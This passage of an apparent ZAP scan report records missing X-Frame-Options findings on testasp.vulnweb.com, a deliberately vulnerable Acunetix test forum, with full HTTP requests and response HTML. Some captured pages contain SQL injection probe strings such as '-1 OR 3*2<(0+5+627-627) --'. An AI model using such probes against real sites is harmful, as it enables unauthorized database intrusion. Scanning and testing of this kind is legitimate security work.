enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=82 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=82 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:46 GMT Content-Length: 4151 |
Response Body - size: 4,151 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D82" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:17:06 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1" OR 3*2<(0+5+332-332) -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=83 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=83 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:46 GMT Content-Length: 3844 |
Response Body - size: 3,844 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D83" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=9 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 344 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=9 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:40 GMT Content-Length: 4197 |
Response Body - size: 4,197 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1 OR 3*2<(0+5+627-627) -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1 OR 3*2<(0+5+627-627) -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1 OR 3*2<(0+5+627-627) -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Templatize.asp?item=html/about.html |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 341 bytes. |
GET http://testasp.vulnweb.com/Templatize.asp?item=html/about.html HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:38 GMT Content-Length: 4594 |
Response Body - size: 4,594 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>Untitled Document</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <h1>About this website</h1> <p>The website was built with the intention to test the Acunetix Web Vulnerability Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate the forementioned software's capabilities to find those bugs.</p> <p><b>Please DO NOT use this website as a forum site. DO NOT post any sensitive information on this site. This includes e-mail addresses or real names.</b></p> <h1>About Acunetix</h1> <P><B>Combating the web vulnerability threat<BR> </B>Securing a company's web applications is today's most overlooked aspect of securing the enterprise. Web application hacking is on the rise with as many as 75% of cyber attacks done at web application level or via the web. Most corporations have secured their data at the network level, but have overlooked the crucial step of checking whether their web applications are vulnerable to attack. Web applications, which often have a direct line into the company's most valuable data assets, are online 24/7, completely unprotected by a firewall and therefore easy prey for attackers.</P> <P>Acunetix was founded with this threat in mind. We realised the only way to combat web site hacking was to develop an automated tool that could help companies scan their web applications for vulnerabilities. In July 2005, Acunetix Web Vulnerability Scanner was released - a tool that crawls the website for vulnerabilities to SQL injection, cross site scripting and other web attacks before hackers do.</P> <P>The Acunetix development team consists of highly experienced security developers who have each spent years developing network security scanning software prior to starting development on Acunetix WVS. The management team is backed by years of experience marketing and selling security software.</P> <P>Acunetix is a privately held company with its <A href="http://www.acunetix.com/company/contact.htm"> offices</A> in Malta, US and the UK.<BR> </P> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 676 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 25 Origin: http://testasp.vulnweb.com Connection: keep-alive Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml Cookie: ASPSESSIONIDASSBRCRC=FCLMIJFALIPFLHBOMHKNEOFN Upgrade-Insecure-Requests: 1 |
Request Body - size: 25 bytes. |
tfUName=xptAfgrI&tfUPass=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:45 GMT Content-Length: 3256 |
Response Body - size: 3,256 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 682 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 59 Origin: http://testasp.vulnweb.com Connection: keep-alive Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml Cookie: ASPSESSIONIDASSBRCRC=FCLMIJFALIPFLHBOMHKNEOFN Upgrade-Insecure-Requests: 1 |
Request Body - size: 59 bytes. |
tfUName=MnBpwKYW&tfRName=PNjwtkrs&tfEmail=ATsuFRAP&tfUPass=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:56 GMT Content-Length: 3673 |
Response Body - size: 3,673 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=0 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 415 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=0 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:47 GMT Content-Length: 3059 |
Response Body - size: 3,059 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:50 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
